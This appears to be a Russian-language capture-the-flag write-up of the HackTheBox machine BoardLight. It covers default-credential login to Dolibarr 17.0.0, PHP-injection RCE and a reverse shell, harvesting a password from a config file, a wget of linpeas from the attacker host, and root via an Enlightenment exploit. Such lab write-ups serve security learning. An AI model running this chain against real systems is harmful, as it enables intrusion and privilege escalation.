В этой статье предлагаем Вам рассмотреть writeup рейтинговой машины с площадки "HackTheBox", которая называется BoardLight.
Enumeration
Первым делом сканируем порты с помощью утилиты nmap. В результате сканирования, мы обнаружили, что открыто 2 порта. Следующим шагом, нам необходимо добавить ip адрес и hostname в /etc/hosts/, после чего мы можем переходить к исследованию доступных ресурсов.
Изучаем веб ресурс и обнаруживаем hostname, который и добавим в хосты.
Исследование веб-ресурса не дало результатов, однако при перечисление subdomain мы нашли интересный субдомен crm.board.htb, необходимо так же добавить его в наш файл /etc/hosts/.
Exploitation
Перейдя на crm.board.htb нас встречает dolibarr 17.0.0.
Попробуем использовать дефолтные креды admin:admin. Ура, нас пускает в админ панель. Поиск уязвимостей на данную версию привел нас к статье, в которой описывается как добиться rce через внедрение php кода. (ссылка на статью - https://www.swascan.com/security-advisory-dolibarr-17-0-0/)
Создаем веб страницу и внедряем в нее php код из статьи для тестирования
Далее переходим на созданную нами страницу и наблюдаем что код выполняется.
Так как php код у нас выполняется, было принято решение попробовать использовать Php PentestMonkey payload, который можно взять с данного ресурса https://www.revshells.com/.
Включаем прослушиватель на выбранном нами порту и ловим шелл.
Мы получили пользователя с низкими привилегиями www-data. Наша следующая задача проверить какие пользователи находятся в системе и имеют более высокие привилегии.
В директории /home находим пользователя larissa,к папке которого у нас нет доступа. Немного погуглив где располагаются конфигурационные файлы dolibarr, мы находим необходимый файл по пути /html/crm.board.htb/htdocs/conf и получаем пароль.
Проверяем найденный пароль на пользователя larissa и получаем пользователя с более высокими привилегиями, а также наш первый флаг.
Privilege Escalation
Пользователь larissa не имеет файлов которые мы могли бы использовать для повышения привилегий, а также команды sudo –l и find / -perm –u=s 2>/dev/null не принесли результатов.
Загружаем Linpeas на атакуемую машину с нашей, воспользовавшись возможностями языка python.
На атакуемой машине скачиваем файл введя команду wget http://ourIP:PORT/Filename и предоставляем права на исполнение командой chmod +x filename
Просматривая результаты linpeas, обнаруживаем службу Enlightenment и смотрим на ее версию,в нашем случае версия 0.23.1
Первый же запрос в поисковике выдает нам эксплоит на PE.
(ссылки на статьи - https://www.exploit-db.com/exploits/51180, https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/tree/main)
Создаем баш скрипт,выдаем ему необходимые права на исполнение и запускаем.
Получаем root флаг.....
А на этом всё!! Спасибо за внимание. Подписывайтесь на наш telegram-канал AUTHORITY. Пишите комментарии.